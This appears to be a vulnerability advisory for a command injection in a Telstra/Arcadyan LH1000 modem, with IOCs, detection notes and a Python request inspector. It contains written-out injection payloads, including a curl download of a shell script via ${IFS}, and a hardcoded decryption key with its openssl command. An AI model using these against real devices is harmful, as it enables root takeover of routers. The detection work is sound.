CVE-2023-43477
published 2023-09-20

Priority: P2, 68, high
CVSS 3.1: 8.8
Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
EPSS: 15.75% (96.5th percentile)
The ping_from parameter of ping_tracerte.cgi in the web UI of Telstra Smart Modem Gen 2 (Arcadyan LH1000), firmware versions < 0.18.15r, was not properly sanitized before being used in a system call, which could allow an authenticated attacker to achieve command injection as root on the device.

Affected

2 ranges
Vendor   Product                   Version range  Fixed in
telstra  arcadyan_lh1000_firmware  < 0.18.15r     0.18.15r
telstra  smart_modem_gen_2         < 0.18.15r     0.18.15r

Detection & IOCs (extracted from sources)

path: /ping_tracerte.cgi
command: ping_from=;uname+-a
command: ping_from=;curl${IFS}http://192.168.0.2:443/shell.sh${IFS}-o${IFS}/tmp/shell.sh;
path: /tmp/shell.sh
path: /usr/sbin/httpd
path: /hninh987R47san82.htm
path: /fake_upload.cgi
path: /login_fw.cgi
cookie: SID_63c6d632=[logged_in_cookie_val]
other: httoken=518287608
command: openssl enc -d -aes-256-cbc -md MD5 -salt -in LH1000V1-backup.cfg -out dec.tgz -k '2&15u69A'
other: 2&15u69A
path: /sbin/arc_deviceready
  • Detect POST requests to /ping_tracerte.cgi where the ping_from parameter contains shell metacharacters (e.g., semicolons, ${IFS}) indicative of command injection attempts.
  • Alert on HTTP POST requests to /fake_upload.cgi from unauthenticated sources, which may indicate exploitation of the unauthenticated firmware/config upload vulnerability (CVE-2023-43478).
  • Monitor for access to /hninh987R47san82.htm, a hidden page that exposes firmware update and configuration restore functionality to unauthenticated users.
  • Detect use of ${IFS} in HTTP POST body parameters targeting LH1000 devices, a common technique to bypass space filtering in command injection payloads.
  • Monitor for unexpected telnet (port 23) activity on LH1000 devices after a reboot, which may indicate a malicious configuration backup was uploaded enabling a root telnet shell.
  • Inspect POST bodies to ping_tracerte.cgi for the util_name=pingtest pattern combined with anomalous ping_from values containing semicolons or command chaining characters.
  • The vulnerability requires authentication (post-auth) for CVE-2023-43477; an attacker must have valid credentials or a valid session cookie (SID_63c6d632) to exploit the ping_from command injection.
  • The hardcoded encryption key '2&15u69A' used for LH1000 configuration backups (AES-256-CBC, MD5) allows any attacker to decrypt, modify, and re-encrypt configuration files for malicious upload.
  • Uploading a malicious configuration backup with incorrect settings could permanently disable the device, even beyond recovery using the hardware factory reset.
  • The httoken value used in requests can be obtained by executing ArcBase._t() in a JavaScript console on the main login page, or copied from recent traffic; it is not a strong CSRF protection.
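
The request-level detection points listed above, combined into one check over HTTP requests to the modem's web UI. This is an added example, not code from the advisory or the vendor; the function name inspect_request, the metacharacter set, the `note` parameter and the sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Characters a shell treats specially; none belong in a ping source value.
SHELL_META = re.compile(r"[;|&$`<>(){}\\\n]")
# Paths named in the detection notes. Authentication state is not visible
# at this level, so any access is reported for triage.
WATCHED_PATHS = {
    "/fake_upload.cgi": "upload endpoint tied to CVE-2023-43478",
    "/hninh987R47san82.htm": "hidden firmware/config restore page",
}

def inspect_request(method, path, body=""):
    """Return the list of findings for one request to the modem web UI."""
    findings = []
    path = path.split("?", 1)[0]
    if path in WATCHED_PATHS:
        findings.append(f"{method} {path}: {WATCHED_PATHS[path]}")
    # Decode first so %24%7BIFS%7D is caught as well as the literal form.
    if method == "POST" and "${IFS}" in unquote_plus(body):
        findings.append("${IFS} in POST body")
    if method == "POST" and path == "/ping_tracerte.cgi":
        # separator="&" keeps ';' inside the value instead of splitting on it.
        params = parse_qs(body, keep_blank_values=True, separator="&")
        for value in params.get("ping_from", []):
            if SHELL_META.search(value):
                tool = params.get("util_name", ["?"])[0]
                findings.append(
                    f"ping_from has shell metacharacters (util_name={tool}): {value!r}")
    return findings

# Constructed sample requests (method, path, body); not captured traffic.
SAMPLES = [
    ("POST", "/ping_tracerte.cgi", "util_name=pingtest&ping_from=192.168.0.1"),
    ("POST", "/ping_tracerte.cgi", "util_name=pingtest&ping_from=;uname+-a"),
    ("GET", "/hninh987R47san82.htm", ""),
    ("POST", "/login_fw.cgi", "note=a%24%7BIFS%7Db"),  # 'note' is hypothetical
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample[:2], inspect_request(*sample))
```
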